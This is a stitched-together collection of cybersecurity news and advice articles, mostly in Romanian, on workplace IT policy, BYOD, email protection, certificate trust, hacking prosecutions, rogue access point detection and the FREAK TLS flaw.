sfaturi nu sunt potrivite sau sunt de-a dreptul neinspirate. Cea mai des auzita plangere este ca IT-istii nu lasa angajatii sa instaleze diverse programe, iar acest lucru creeaza animozitati fiindca angajatii ii considera prea stricti si uneori rau-intentionati. Mai grav, in multe cazuri managerii iau diverse decizii legate de computerele cumparate si de programele ce pot fi instalate, fara a cere macar un sfat de la IT-isti. Mai mult, sondajele au aratat ca cei din board-ul companiei nu se consulata cu departamentul de IT cand e vorba de implementarea unei noi platforme de cloud si in multe cazuri IT-isti sunt marginalizati si ca plasare "fizica" in sediul unei companii (la subsol sau intr-un colt indepartat al une hale). Cateva moduri de a construi un departament bun de IT Departamentul de IT isi poate schimba imaginea in interiorul unei companii, iar pentru asta este important sa existe un om care se pricepe atat la partea de informatica, insa si la interactiunea cu angajatii. Acea persoana (sau mai multe in firmele mai mari) are un rol esential in a explica angajatior importanta diverselor politici de IT. Tehnologia poate fi "umanizata" si explicata pe intelesul tuturor, astfel incat sa nu mai existe animozitati. Esential este ca IT-istii sa explice angajatilor care sunt principalele pericole informatice si in special cum sa fie vigilenti cand primesc e-mail-uri cu atasamente ce pot contine malware. Daca angajatii primesc aceste instructiuni, multe situatii neplacute pot fi evitate. Un element esential este ca departamentul de IT sa primeasca resursele tehnice solicitate, fiindca fara aparatura de ultima ora activitatea nu s-ar putea desfasura eficient in interiorul companiei si nici situatiile de criza n-ar putea fi gestionate rapid. Un alt lucru important este ca departamentul IT sa aiba un cuvant de spus si in deciziile de business ale companiei. Seful de departament ar putea participa la sedintele board-ului si parerile ar putea fi (macar) ascultate in legatura cu diversele planuri ce au impact si asupra infrastructurii informatice, opinia lui putand evita situatii neplacute in viitor. Insa in foarte multe dintre cazuri disensiunile dintre IT-isti si ceilalti angajati pornesc de la faptul ca cei din urma vor sa foloseasca la serviciu terminalele personale fiindca se simt mai bine cu ele. Aceasta dorinta naste insa probleme de securitate, iar companiile trebuie sa gaseasca un echilibru intre nevoia de siguranta si dorinta angajatilor de a-si folosi gadget-urile. BYOD - Cum pot angajatii sa-si foloseasca propriile terminale la serviciu Masurile de securitate par sa nu fie niciodata suficiente cand este vorba despre data center-ul unei companii, angajatii sau clientii sai. In Romania, rata de adoptie a tendintelor BYOD (bring your own device) in mediul de lucru nu este inca semnificativa, dar are un potential imens in cresterea productivitatii si imbunatatirea aptitudinilor angajatilor, conform unui studiu CIO Council. Mai mult de jumatate dintre companii abordeaza mobilitatea ad-hoc, in functie de dispozitiv, fara a avea o strategie sau politici de securitate bine definite, arata acelasi studiu. Cu toate acestea, adoptia tacita este semnificativa: 11% pentru telefoane inteligente si 21% pentru tablete. Odata cu raspandirea telefoanelor mobile, a tabletelor si altor gadget-uri, BYOD devine o amenintare tot mai mare la adresa securitatii IT. Prin mentinerea controlului securitatii si managementul terminalelor, specialistii IT pot raspunde riscurilor de securitate. Acest lucru este necesar pentru imbunatatirea productivitatii si agilitatii mediului enterprise. Este nevoie de o combinatie de "unelte" care trebuie folosite corect. Iata cateva dintre ele: Echipa tehnica trebuie sa realizeze un audit de securitate pentru a identifica vulnerabilitatile existente si a evalua potentialele riscuri. O eroare umana a unui angajat sau alte amenintari interne sunt printre cele mai des intalnite metode de a infiltra reteaua companiei. Urmeaza tehnicile de inginerie sociala dirijate catre angajati, pentru a le fura datele confidentiale. De aceea, companiile trebuie sa instruiasca angajatii cu privire la bunele practici de siguranta a datelor. Pe cat de paranoic suna, departamentele de IT trebuie sa ia in calcul istoricul si comportamentul angajatilor. Multe dintre atacuri pornesc de la o persoana care a deschis un atasament malitios. Specialistii trebuie sa ia in considerare concedierea angajatilor vinovati si recuperarea datelor companiei de pe dispozitivul personal al angajatului. De asemenea, este importanta securizarea retelei cu un firewall. Angajatii vor deveni astfel mai constienti de riscurile la care sunt expusi, chiar si atunci cand sunt online in miscare sau conectati la reteaua de acasa. Actualizarea tuturor soft-urilor si dispozitivelor si implementarea unei politici cu privire la configurarea parolelor este foarte importanta (parole de minim 8 caractere, unice si complexe, schimbate regulat). In ceea ce priveste uneltele pe care departamentul IT le poate folosi, o solutie de management a securitatii dedicata mediului de business nu este o optiune, ci o necesitate. Departamentele IT trebuie sa instaleze si sa actualizeze o solutie certificata care sa consolideze controlul pentru terminale virtualizate, fizice si mobile. Pe langa amenintarile de de tip APT si atacurilor de tip denial-of-service, masurile de securitate improprii sunt punctele slabe care pot distruge o reputatia si micsora veniturile unei companii. Consumerizarea domeniului IT si tendintele BYOD trebuie sa ii oblige pe sefii departementelor informatice sa revizuiasca ceea ce inseamna strategia de securitate in mediul de business. Companiile nu ar trebui sa restrictioneze utilizarea dispozitivelor personale ale angajtilor, insa nu este recomandat sa fie prea permisive. O politica pentru email, internet si dispozitive mobile va ajuta lacrearea unui mediu mai sigur si la o satisfactie sporita a angajatilor. Interzicerea Facebook la locul de munca - o idee care face mai mult rau decat bine Unele companii sunt restrictive cand e vorba de dreptul angajatilor de a accesa retelele sociale de la locul de munca, iar un studiu din 2013 arata ca aproape o cincime din angajatii din SUA au interdictie cand e vorba de utilizarea Facebook de pe computerele de la job. Procentul a mai scazut intre timp fiindca s-a ajuns la un consens in legatura cu interzicerea Facebook la munca: este mai bine sa nu fie aplicata, fiindca nu creste productivitatea angajatului si, mai rau, este si o dovada de neincredere. Angajatii nu lucreaza efectiv tot programul si e normal sa mai ia scurte pauze de 10-15 minute. In acele pauze se mai deconecteaza si tot in acele mici intervale isi reincarca bateriile, lucru ce stimuleaza si productivitatea. In acele pauze unii stau la povesti cu colegii, iar altii prefera sa "arunce" o privire pe Facebook. Daca li s-ar lua aceasta posibilitate, angajatii se vor simti frustrati si nedreptatiti. Angajatii tineri, atat de obisnuiti cu Facebook-ul, vor fi deranjati de o interdictie la munca si s-ar putea simti jigniti, mai ales ca foarte multi sunt constiinciosi, facandu-si treaba fara a fi presati. Daca unii angajati sunt neproductivi, nu Facebook este cauza, ci poate fi vorba de motivare sau de atmosfera ostila de la locul de munca. In plus, argumentul decisiv tine de faptul ca, si daca Facebook si alte retele sunt interzise pe computerul de la serviciu, angajatii pot gasi solutii care intr-adevar pot dauna productivitatii, cum ar fi statul pe Facebook pe smartphone, prin propria conexiune de date. Source

Microsoft România lanseaz? o campanie educa?ional? prin care î?i propune s? le ofere utilizatorilor de internet instrumentele necesare pentru a face fa?? amenin??rilor din mediul online. Începând de ast?zi, cei care acceseaz? site-ul Microsoft.ro/Securitate pot afla informa?ii esen?iale despre riscurile majore de securitate din mediul online ?i pot înv??a cum s? identifice ?i s? previn? amenin??rile online. Problema securit??ii cibernetice atrage din ce în ce mai mult? aten?ie, având în vedere tendin?a de cre?tere a num?rului de infrac?iuni cibernetice înregistrat? în ultimii ani. În România, 66% dintre utilizatorii de internet consider? c? nu au suficiente informa?ii referitoare la riscurile generate de fenomenele de criminalitate cibernetic? ?i nici instrumente pentru a se ap?ra împotriva acestora1. În acela?i timp, vârsta la care copiii încep s? acceseze internetul ?i, prin urmare, s? fie expu?i la riscuri similare continu? s? scad?, ajungând la o medie de 8 ani conform celui mai recent studiu realizat de Salva?i Copiii. Campania lansat? de Microsoft România se adreseaz? atât p?rin?ilor, cât ?i tinerilor ?i copiilor cu vârsta peste 8 ani. Website-ul Microsoft.ro/Securitate le ofer? p?rin?ilor acces la informa?ii esen?iale privind nu doar cele mai frecvente amenin??ri online, de la punerea în pericol a reputa?iei online pân? la acordarea involuntar? a accesului la informa?ii personale ?i financiare, ci ?i riscurile la care sunt expu?i copiii lor atunci când utilizeaz? platformele de socializare, precum ?i ce pot face pentru a-i ajuta s? se protejeze împotriva acestor riscuri. În acela?i timp, utilizatorii re?elelor sociale au la dispozi?ie o aplica?ie g?zduit? de pagina de Facebook a Microsoft, care îi poate ajuta s? î?i evalueze propriul comportament pe re?elele de socializare ?i s? afle cum acest comportament îi expune la riscuri sporite. Campania include ?i elemente offline ?i radio ?i se desf??oar? în parteneriat cu Salva?i Copiii România. La nivel global, cea mai recent? edi?ie a Microsoft Computing Safety Index (MCIS) arat? c? incidentele de criminalitate cibernetic? sunt responsabile pentru pierderi financiare estimate la 23 de miliarde de dolari, în vreme ce 2578 de persoane ar trebui s? î?i dedice 70 de ani din via?? pentru a rezolva problemele generate de acest fenomen la nivel global. Pentru a contribui la diminuarea acestor riscuri, Microsoft opereaz? cel mai avansat centru de excelen?? privat dedicat luptei globale împotriva criminalit??ii cibernetice. Microsoft Cybercrime Center lupt? împotriva infrac?iunilor online, inclusiv a celor asociate cu viru?i malware, botnet, înc?lcarea dreptului de proprietate intelectual? ?i facilitarea exploat?rii copiilor prin tehnologie. La cele de mai sus se adaug? un studiu realizat recent de BSA ? The Business Software Alliance, care demonstreaz? c? rata pirateriei cibernetice înregistrat? de o ?ar? este un indicator puternic al ratei de contaminare cu viru?i malware în ?ara respectiv? (o corelare pozitiv? de 0,79). România se num?r? printre ??rile cu cel mai mare risc, 62% dintre programele software instalate în 2014 fiind contraf?cute, comparativ cu media global? de 42%. Printre riscurile asociate cu programe software contraf?cute, 64% dintre utilizatorii globali au men?ionat c? hackerii ar putea ob?ine acces neautorizat la sistemele lor, în vreme ce 59% s-au referit la pierderea datelor. Rezultate cheie ale studiului MCIS 24% din popula?ia utilizatoare de internet la nivel global s-a confruntat cu viru?i online; 15% dintre ace?tia au devenit victime ale atacurilor de tipul phishing; 17% dintre ei au declarat c? reputa?ia personal? le-a fost compromis?; Cu toate acestea, mai pu?in de 20% au luat m?suri active pentru înl?turarea informa?iilor online care le-ar putea afecta reputa?ia; Doar 1 din 3 consumatori utilizeaz? re?ele wireless securizate. Studiul a fost desf??urat în 20 de ??ri din întreaga lume, cu participarea a 10.500 de persoane. Rezultate cheie ale studiului realizat de Salva?i Copiii România 45% dintre copiii din România au declarat c? au fost agresa?i în mediul online în 2014; 58% dintre copiii intervieva?i au men?ionat c? s-au întâlnit cu o persoan? pe care au cunoscut-o pe Internet, iar 20% dintre ei au spus c? au fost deranja?i de aceasta; Într-o zi de ?coal?, copiii petrec în medie 2 ore pe Internet, în vreme ce în zilele libere, petrec pân? la 3-4 ore; 90% dintre copiii din România utilizeaz? cel pu?in o re?ea de socializare. Source

Email-ul este o constant? ?i prezen?? oriunde, f?r? acesta nu putem s? ne desf??ur?m activitatea. Miliarde de mesaje sunt trimise în fiecare lun? ?i nenum?rate mesaje sunt recep?ionate în fiecare s?pt?mân?, adesea zilnic de c?tre utilizatori. Toate aceste mesaje pot fi un vector de atac, un container de malware sau un mod de a distruge afacerile companiilor. De ce email-ul este a?a de vulnerabil? Ce daune pot cauza hackerii prin sistemul de po?t? electronic?? Atacuri l?rgite ?i agravante. Spam-ul, o problem? poate mai mult decât oricând. Este timpul s? lua?i atitudine ?i s? contraataca?i! 1. Parole potrivite Care este primul ?i cel mai adesea singurul nivel de protec?ie pentru mesageria electronic?? Din p?cate cel mai adesea este parola. Deoarece utilizatorii în general folosesc o singur? parol? pentru mai multe aplica?ii exist? probabilitatea ca odat? cu spargerea parolei toate aplica?iile s? fie expuse riscului. Din p?cate, majoritatea parolelor sunt prea simple ?i slabe, foarte u?or de spart întocmai ca o coaja de ou proasp?t. Mai mult conturile partajate create de c?tre personalul IT au parole extrem de simple. De câte ori a?i întâlnit parole de tipul “password”, “admin” sau “guest? Sau poate dac? administratorul este ?iret pune parole de genul “password123”, “admin123” sau “guest123”. Crede?i c? aceste parole vor opri un hacker motivat? Conform consultan?iilor de securitate milioane de parole au fost compromise ?i g?site/ghicite deoarece în majoritatea cazurilor erau mult prea slabe. Jum?tate din aceste parole compromise aveau un nivel sc?zut de securitate, dar în multe cazuri aveau în combina?ie câte un num?r sau litere mari ?i mici. Aproape 90% din parole nu con?in caractere speciale. Chiar mai r?u, cea mai populara parol? în ziua de azi este “Password1” care este la fel de slab? ca “admin” sau “guest”. 2. Oprirea scurgerii de date cu ajutorul filtrului de con?inut Scurgerea de date este o problem? mare ?i în continu? cre?tere. Datele confiden?iale ale companiilor sunt furate la fel ?i numerele cardurilor de credit, coduri numerice personale sau uneori chiar ?i informa?iile medicale. Este necesar? o politic? real? care s? dicteze c? aceste informatiile confiden?iale pot p?r?si organiza?ia sub nicio form? f?r? aprobarea explicit? a managementului. Astfel ave?i nevoie de un instrument care s? verifice cuvinte cheie, s? indice dac? datele confiden?iale p?r?sesc organiza?ia. Aceast? scanare de cuvinte cheie trebuie aplicat? atât mesajului în sine cât ?i ata?amentelor. 3. Oprirea spamului înainte ca acesta s? devin? o problem? ?tiati ca, mai mult de 3% din mesajele spam con?in forme de malware ?i c? predic?iile referitoare la spam nu o s? scad? pentru anul 2015? Ce trebuie f?cut pentru a stopa aceast? problem?? Unele rezolv?ri sunt pur tehnice, dar altele sunt bazate pe politici care pot fi îndeplinite printr-o instruire temeinic?. O tehnic? este aceea de a ?ine adresele de email sub un control strict din punct de vedere al distribuirii ?i post?rii lor. Este esen?ial? o politic? intern? de restric?ie cu privire la unde ?i în ce condi?ii pot fi postate adresele de email. 4. Controlarea con?inutului prin filtrare ?i monitorizare Departamentul IT ?i managementul organiza?iilor ?tiu c? datele/informa?iile reprezint? resursa cea mai pre?ioas?, date despre clienti, date financiare, produse noi, strategii toate acestea pot fi supuse furtului, iar securitatea ?i business-ul pot fi compromise. În alt? ordine de idei un con?inut neadecvat poate fi un alt tip de risc. 5. Oprirea malware-ului Malware-ul sub toate formele ?i dimensiunile nu va disp?rea, va deveni tot mai mali?ios ?i numerous, dup? cum se poate observa noi atacuri apar la tot pasul. Practic trebuie s? lupta?i cu mii de exploit-uri deja existente în timp ce trebuie s? v? proteja?i de exploit-urile de tip zero day. 6. Blocarea bre?elor În fiecare an Verizon studiaz? bre?ele pentru raportul ”Data Breach Investigations Report”. O descoperire tulburatoare este c? atacurile prin intermediul email-ului sunt utilizate din ce în ce mai mult pentru spionaj ?i c? acestea pot fi lansate de criminali sau organiza?ii statale. 7. Conformitatea Toate aceste probleme men?ionate mai sus sunt mult mai serioase pentru companiile care sunt obligate s? respecte reglement?rile de conformitate ?i trebuie s? demonstreze c? sistemul de po?t? electronic? ?i datele con?inute sunt protejate. 8. Instruire ?i bune practici Departamentul IT este r?spunz?tor pentru instalarea tehnologiei ?i rezolvarea problemelor tehnice, implementând firewall, anti-malware ?i alte echipamente. Din p?cate aceste linii de ap?rare nu sunt suficiente. Instruirea poate ajuta mai ales în blocarea atacurilor de tip phishing ?i cel mai bine o ?tie faimosul hacker Kevin Mitnick care lucreaz? la compania KnowBe4 LLC ca instructor de securitate. Acest? companie a studiat timp de un an 372 de magazine ce aveau aproximativ 291000 de sta?ii de lucru. Înainte de începerea training-ului procentul de phishing atingea 16%, dup? training a ajuns la 1,28%, KnowBe4 LLC consider? c? cel mai mare inamic al companiei este personalul neinstruit care utilizeaz? computerele. 9. Lupta împotriva atacurilor de tip phishing Atacurile de tip phishing au cel mai adesea succes ?i de aceea ”baie?ii r?i” insist? în a executa acest tip de atac. Chiar dac? primul atac este nereu?it exist? o ?ans? ca al doilea sau chiar al treilea atac s? aib? o ?ans? de reu?it? în concordan?? cu studiul celor de la Verizon. Referitor la studiul men?ionat s-a f?cut o simulare ?i s-a rulat o campanie cu trimiterea de doar 3 mesaje de tip phishing care genereaz? un procent de 50% ?ans? pentru cel pu?in un click. Rulând campania de dou? ori probabilitatea de click cre?te la 80% ?i totodat? trimiterea de 10 mesaje de tip phishing conduce la reu?ita atacatorilor de a ob?ine garantat un click spune Verizon. 10. Implementarea protec?iei în adâncime Instruirea utilizatorilor pentru identificarea mesajelor mali?ioase ?i a atacurilor de tip ”social engineering” este critic?, dar trebuie s? ave?i ?i tehnici adecvate de ap?rare. Aceasta înseamn? protec?ie împotriva tuturor formelor de intruziune ?i scurgere de date. Deci trebuie s? ave?i: • antivirus ?i antimalware • protec?ie spam • filtrare de con?inut Din fericire GFI Software are integrate unelte care ofer? o protec?ie în adâncime ?i sunt disponibile local, în cloud, sau în structur? hibrid? unde unele componente software sunt locale ?i altele în cloud conlucrând împreun?. La nivel local GFI ofer? GFI MailEssentials care este disponibil în 3 versiuni de la edi?ia complet? unified protection cu antivirus/antimalware ?i protec?ie spam, pân? la edi?ia antispam/antiphishing ?i edi?ia pur? antivirus/antimalware. Pe partea de antimalware GFI MailEssentials ofer? 5 motoare puternice antivirus care scaneaz? mesajele împotriva poten?ialelor exploit-uri. În plus GFI MailEssentials poate cur??a cod HTML din mesaje script mali?ioase înainte de a fi transmise pentru a nu cauza o infec?ie. GFI a ad?ugat unelte pentru ca utilizatorii s?-?i poat? administra carantina de spam, whitelist and blacklist. Mai mult uneltele GFI captureaz? peste 99% din totalul de mesaje spam. GFI MailEssentials câ?tig? regulat premiul VBSpam+ pentru rata de 0% falsuri pozitive. Urm?rirea con?inutului ?i aplicarea politicilor sunt critice ?i aici GFI MailEssentials permite departamentului IT s? seteze politici bazate pe grup sau utilizatori ?i reguli bazate pe header, cuvinte cheie sau ata?amente. Toate acestea pot fi administrate de c?tre personalul IT dintr-o consol? web care include ?i o unealt? de raportare integrat?. În final solu?ia se instaleaz? numai pe server nefiind nevoie de instalare de aplica?ii la client. Source

President Barack Obama has ordered the shoring up of sanctions that the US could use against individuals and nations that attack the country with cyber tools and threats. No new sanctions have been created, but Obama is keen to see existing measures applied with more force and frequency. The US has used these tools before, and they were raised during discussions about the alleged North Korea attack on Sony Pictures. The president presents his actions as a reaction to the real menace that is growing in scale and capability and continues to hurt US firms like Home Depot. "I find that the increasing prevalence and severity of malicious cyber-enabled activities originating from, or directed by, persons located, in whole or in substantial part, outside the US constitute an unusual and extraordinary threat to the national security, foreign policy and economy of the US. I hereby declare a national emergency to deal with this threat," he said. The response is a greater use of sanctions, and an increase in the powers available to the government, according to a White House blog post. "We are at a transformational moment in how we approach cyber security. The actions we take today will help ensure that the internet remains an enabler of global commerce and innovation," said Lisa Monaco, US homeland security advisor to president Obama. "We need to deter malicious cyber activity and to impose costs in response to the most significant cyber intrusions and attacks, especially when those responsible try to hide behind international boundaries. "Effective incident response requires the ability to increase the costs and reduce the economic benefits from malicious cyber activity. We need a capability to deter and impose costs on those responsible for significant harmful cyber activity where it really hurts - at their bottom line." Businesses such as the US Postal Service have been attacked with greater frequency over the past year and, while international entities are not always blamed, China is a regular suspect. Sanctions can be imposed against a nation or an individual, and they are expected to be used only at times when US assets and infrastructure are under threat. Source

Google's Chrome browser will stop trusting all digital certificates issued by the China Internet Network Information Center following a major trust breach last week that led to the issuance of unauthorized credentials for Gmail and several other Google domains. The move could have major consequences for huge numbers of Internet users as Chrome, the world's second most widely used browser, stops recognizing all website certificates issued by CNNIC. That could leave huge numbers of users suddenly unable to connect to banks and e-commerce sites. To give affected website operators time to obtain new credentials from a different certificate authority, Google will wait an unspecified period of time before implementing the change. Once that grace period ends, Google engineers will blacklist both CNNIC's root and extended-validation certificates in Chrome and all other Google software. The unauthorized certificates were issued by Egypt-based MCS Holdings, an intermediate certificate authority that operated under the authority of CNNIC. MCS used the certificates in a man-in-the-middle proxy, a device that intercepts secure connections by masquerading as the intended destination. Such devices are sometimes used by companies to monitor employees' encrypted traffic for legal or human resources reasons. It's one of the first times a certificate authority has faced such a banishment since the downfall of Netherlands-based DigiNotar in 2011. Other CAs, including US-based Trustwave, have also done what CNNIC did without getting the boot. While worldwide Chrome is the No. 2 most used browser, it had a commanding, 52-percent share in China last year, compared to 23 percent for IE. The move was announced on Wednesday evening in an update to last week's blog post disclosing the misissued certificates. The update left open the possibility that CNNIC may be reinstated at an undetermined future date if the group gives a detailed accounting of all currently valid certificates. The update read: As this post was being prepared, it wasn't clear if Mozilla or Microsoft planned to update Firefox and Internet explorer to also stop trusting CNNIC. Firefox 37, released this week, stopped trusting all certificates issued by MCS Holdings, and Microsoft has announced similar plans for Windows. Revoking trust in the root CNNIC certificate would be a much more disruptive course of action, since many more website certificates would be affected. Update 1: In an e-mailed statement, Mozilla Cryptographic Engineering Manager Richard Barnes said: "We believe it is very important to include the Mozilla community in these discussions, so we are taking a bit longer to announce our official plan. We expect to wrap up our discussion in mozilla.dev.security.policy soon, and in the meantime you can see the plan we are currently discussing here." The plan under consideration would: Reject certificates chaining to CNNIC with a notBefore date after a threshold date Request that CNNIC provide a list of currently valid certificates and publish that list so that the community can recognize any back-dated certs Allow CNNIC to re-apply for full inclusion, with some additional requirements (to be discussed on this list) If CNNIC's re-application is unsuccessful, then their root certificates will be removed Update2: Officials with CNNIC have issued a statement that's sharply critical of Google's move. It reads: Source

A man from Indiana has pleaded guilty for his role in a hacking ring that targeted major games developers. Austin Alcala, 19, from the town of McCordsville, admitted guilt (PDF) to charges of conspiracy to commit computer intrusion and criminal copyright infringement. Alcala will be sentenced on a July 29 hearing, where he could face as much as five years in prison. The teenager was part of a group of hackers who sought to steal data from game studios between the Spring of 2012 and April 2014. The group targeted companies including Microsoft, Valve and Epic games, where they broke into corporate networks and pilfered internal documents, source code and unreleased games. The US Department of Justice (DOJ) said Alcala worked with the other members of the group to infiltrate systems owned by Microsoft in order to steal software and internal documents discussing the then-unreleased Xbox One console and Xbox Live online gaming service. He was also said to be involved in heists targeting the FIFA, Call of Duty: Modern Warfare and Gears of War franchises. In one instance, the DOJ alleges Alcala stole 11,266 log-in credentials from an unnamed company and distributed them to other members of the group. The DOJ estimates that the business data, code and games the group pilfered from their targets added up to between $100m and $200m. No customer information was believed to have been stolen. Alcala's conviction was the fourth related to the games hacking group. The FBI has already won convictions against Sanadodeh Nesheiwat of New Jersey, David Pokora of Ontario, Canada and Nathan Leroux of Maryland. Nesheiwat and Pokora are scheduled to be sentenced later this month, Leroux will be sentenced in May. The DOJ said that the FBI is still investigating the case and working with law enforcement agencies in Canada and Australia to hunt down other members of the international group. Source

Mohamed Idris has created a tool to help network administrators discover and DoS rogue access points. The EvilAP Defender open source tool published to GitHub can be run by admins at intervals to determine if attackers are attempting to get their users to connect to malicious networks. Those evil twin attack networks are powerful copycats of legitimate access points that attempt to get users to connect in a bid to harvest subsequent traffic. Idris says the tool will send email alerts to admins when evil twins are detected, and launch denial of service attacks to buy time. "Additionally you can configure the tool to perform DoS on discovered evil AP in order to give the administrator more time to react," Idris says. "However, notice that the DoS will only be performed for evil APs which have the same SSID but different BSSID (AP’s MAC address) or running on a different channel. This to avoid DoS your legitimate network." More features are being added including on the back of Reddit network security discussion, including SMS notification. It presently paints access points as evil based on BSSIDs and attributes including channels, ciphers, protocols, Organizationally Unique Identifiers, and authentication. Admins can put the tool in learning mode so that it can identify friendly networks. Users are invited to email Idris about the tool at moha99sa via yahoo.com. Bootnote: Launching denial of service attacks against something you don't own, even a very obvious Evil Twin, could be illegal. Effective, clever, but illegal. Source

serios, ai deschis un topic despre un joc de rahat, ai si vazut ca jucatorii de metin de pe aici sunt luati la misto. Chiar nu ai invatat nimic de atata timp cat esti aici?

The recently disclosed FREAK (Factoring attack on RSA Export Keys) attack is an SSL/TLS vulnerability that is affecting major browsers, servers and even mobile devices. FREAK vulnerability allows the attacker to intercept HTTPS connections between vulnerable clients and servers and force them to use weakened encryption, which the attacker can break to manipulate or steal sensitive data. Although most major hardware/software vendors and owners have patched this flaw, many are still susceptible to this kind of attack. Instrumental in discovering FREAK flaw, the University of Michigan conducted scans and discovered that an estimated 36.7% of the 14 million websites offering browser-trusted certificates were vulnerable at the time of disclosure. This includes some very high profile pages like nsa.gov, irs.gov and even the ubiquitous connect.facebook.com (the source of all Facebook "Like" buttons.) IMPACTS OF FREAK ATTACK Intercepts your sensitive, encrypted, web sessions via a man-in-the-middle attack, putting your clients at risk Redirects users to malicious sites and harvests credentials, giving attackers the ability to pivot and attack your environments directly and steal sensitive data (intellectual property) Forces weak encryption, even if you use a strong encryption method, making stealing your data much easier Affects a large number of vendors including every Windows version, Apple’s mobile and desktop operating systems, and Google Android HOW TO PROTECT AGAINST FREAK? AlienVault Unified Security Management (USM) can help. USM provides asset discovery, vulnerability assessment, threat detection (IDS), behavioral monitoring and SIEM in a single console. USM can scan your network to identify assets with the FREAK vulnerability, making it easy for you to identify systems that need to be patched and prioritize remediation. Not only can USM identify vulnerable systems, it can also help you detect attempted exploits of the vulnerability. Within hours of the discovery of the FREAK vulnerability, the AlienVault Labs team pushed updated correlation directives to the USM platform, enabling users to detect attackers attempting to exploit it. USM also checks the IP information against the Open Threat Exchange (OTX), the largest crowd-sourced threat intelligence exchange. In the example below, you can see details from OTX on the reputation of an IP, including any malicious activities associated with it. Learn more about AlienVault USM: - Download a free 30-day trial - Watch a demo on-demand - Play with USM in our product sandbox (no download required) Source